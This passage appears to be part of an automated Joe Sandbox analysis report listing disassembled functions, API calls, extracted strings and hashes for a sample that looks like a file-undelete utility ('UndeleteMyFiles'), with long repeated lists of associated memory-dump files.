Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: c7e41aa40b5285c780a2cebcf6e90f610cd9dfb629c0feb45a5f9bfc54831eaa
Instruction ID: 808b30213c411702ddb43ed93b33c05a128fc116e306a2bb823343a795e75f3d
Opcode Fuzzy Hash: c7e41aa40b5285c780a2cebcf6e90f610cd9dfb629c0feb45a5f9bfc54831eaa
Instruction Fuzzy Hash: D611B9B1A41318ABDB10ABA2DD49FEF77A8EB50745F000027F6069B1C0EAB49C45C766

Function 0044A100 Relevance: 13.6, APIs: 9, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 0040D018: _memset.LIBCMT ref: 0040D034

Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0044A14D
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0044A15F
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0044A171
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0044A183
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0044A195
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0044A1A7
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0044A1B9
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0044A1CB
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0044A1DD

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: ProcessorVirtual$Concurrency::RootRoot::$_memset
String ID:
API String ID: 2430013609-0
Opcode ID: 912586e59fd2f9d1d5f3f002f9378e224394c920404e3e5689c8b98cf2569018
Instruction ID: b37e3b47af9118eae9e786af94bd90dd8db44aca02df0f16a7a5b71765c74da2
Opcode Fuzzy Hash: 912586e59fd2f9d1d5f3f002f9378e224394c920404e3e5689c8b98cf2569018
Instruction Fuzzy Hash: 87216D71D05159DBDB05FB98C955BAEBB70FF05308F1486ADE0252B3C2CB791A00C769

Function 0044CB90 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 243COMMON

Download Yara Rule

APIs

Part of subcall function 0044C8F0: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,87E7D08C), ref: 0044C93E
Part of subcall function 0044C8F0: SetLastError.KERNEL32(24000006), ref: 0044C94D

__strdup.LIBCMT ref: 0044CD82
__strdup.LIBCMT ref: 0044CDFD
__strdup.LIBCMT ref: 0044CE75

Strings

Subject:, xrefs: 0044CE12
From ???@??? , xrefs: 0044CC3D
To:, xrefs: 0044CD9A
From:, xrefs: 0044CD1F

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: __strdup$ErrorFileLastPointer
String ID: From ???@??? $From:$Subject:$To:
API String ID: 3755502967-4223022852
Opcode ID: 549854a8c6d30e43d2aa1072f04de7bd2a027521f139f92faabc1ea5bca7878b
Instruction ID: 6524cdae8511a3a762a735f005addcdf8e04230cf98e6bffa4290abe9a3601dc
Opcode Fuzzy Hash: 549854a8c6d30e43d2aa1072f04de7bd2a027521f139f92faabc1ea5bca7878b
Instruction Fuzzy Hash: 64A140B4E012099BDB04DF95D895BEEBBB1FF08314F18812EE80567381DB39A945CF98

Function 00458915 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 186memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00469250: _DebugHeapAllocator.LIBCPMTD ref: 00469286
Part of subcall function 00469250: _DebugHeapAllocator.LIBCPMTD ref: 004692EE
Part of subcall function 00469250: _DebugHeapAllocator.LIBCPMTD ref: 00469306

_DebugHeapAllocator.LIBCPMTD ref: 0045897B

Part of subcall function 004036D0: _DebugHeapAllocator.LIBCPMTD ref: 00403708
Part of subcall function 004036D0: _DebugHeapAllocator.LIBCPMTD ref: 0040374B

GetFileAttributesExW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,00000001,?,?,87E7D08C), ref: 004589C4

Part of subcall function 0040855C: _malloc.LIBCMT ref: 0040857A

_DebugHeapAllocator.LIBCPMTD ref: 00458A38

Strings

D#I, xrefs: 00458AD8
<unknown>, xrefs: 00458B79
<unknown>, xrefs: 00458E0F
File, xrefs: 00458B2D

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: AllocatorDebugHeap$AttributesFile_malloc
String ID: <unknown>$<unknown>$D#I$File
API String ID: 2285631665-2932087708
Opcode ID: 47d3fe38370a3c6d753b3dd6f56eafb0360d52a6ee3689862ccf80c40a717396
Instruction ID: 145f3f62fa742e7e444f19d3c9fbe390dafc63dd259708c4a523c71e6450a63f
Opcode Fuzzy Hash: 47d3fe38370a3c6d753b3dd6f56eafb0360d52a6ee3689862ccf80c40a717396
Instruction Fuzzy Hash: 7D812B71A00228AFDB25DB54CC92BDEB3B5AF48704F1081DEE609BB281DB756E84CF55

Function 004088E4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117threadwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00408832: GetParent.USER32(?), ref: 00408886
Part of subcall function 00408832: GetLastActivePopup.USER32(?), ref: 00408897
Part of subcall function 00408832: IsWindowEnabled.USER32(?), ref: 004088AB
Part of subcall function 00408832: EnableWindow.USER32(?,00000000), ref: 004088BE

EnableWindow.USER32(?,00000001), ref: 00408931
GetWindowThreadProcessId.USER32(?,?), ref: 00408945
GetCurrentProcessId.KERNEL32 ref: 0040894F
SendMessageW.USER32(?,00000376,00000000,00000000), ref: 00408967
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004089E3
EnableWindow.USER32(00000000,00000001), ref: 00408A2A

Strings

0, xrefs: 004089BC

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID: 0
API String ID: 1877664794-4108050209
Opcode ID: 7829e949b7b2a5a800e7eba5292431b8837252ea4aad70281c6ac6cc1ec90bb6
Instruction ID: c6b125eb5c862417f397dbabc9a66fd67b73bc3f7a45c20324e472c3ad8facbf
Opcode Fuzzy Hash: 7829e949b7b2a5a800e7eba5292431b8837252ea4aad70281c6ac6cc1ec90bb6
Instruction Fuzzy Hash: 7641E9B1A00218ABDB20AF65DD85BAA77B4FF14304F1005BEE595E72D1EB74CD408F9A

Function 0040E2BF Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 0040E2FF
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040E329
GetSystemMetrics.USER32(00000000), ref: 0040E340
GetSystemMetrics.USER32(00000001), ref: 0040E347
MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,?,00000020), ref: 0040E372

Strings

B, xrefs: 0040E309
DISPLAY, xrefs: 0040E369

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: System$ByteCharMetricsMultiWide$InfoParameters
String ID: B$DISPLAY
API String ID: 381819527-3316187204
Opcode ID: cdb3161b3a8c618c9ace7bd0529e1f42761dc00f2d95a85ab69a31f65da62255
Instruction ID: 70ca2fc62e3ca27052c27f75168b1a478b6263ee91b2574e672af451f2b4c301
Opcode Fuzzy Hash: cdb3161b3a8c618c9ace7bd0529e1f42761dc00f2d95a85ab69a31f65da62255
Instruction Fuzzy Hash: 6421F871500220EBDF208F668C88E5B7FA8EF49760F104537FC15AB2C1D6B4D850CBA9

Function 0045C420 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 84stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041383F: EnableWindow.USER32(?,?), ref: 00413850

Part of subcall function 0045B6A0: __wcsnicmp.LIBCMT ref: 0045B74A
Part of subcall function 0045B6A0: lstrlenW.KERNEL32 ref: 0045B81D

wsprintfW.USER32 ref: 0045C4BB
lstrlenW.KERNEL32(?), ref: 0045C4F4
wsprintfW.USER32 ref: 0045C535

Strings

h#I, xrefs: 0045C467
Total files match search criteria: %d, xrefs: 0045C4AF
UndeleteMyFiles, xrefs: 0045C542
%d - on %s, xrefs: 0045C522

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
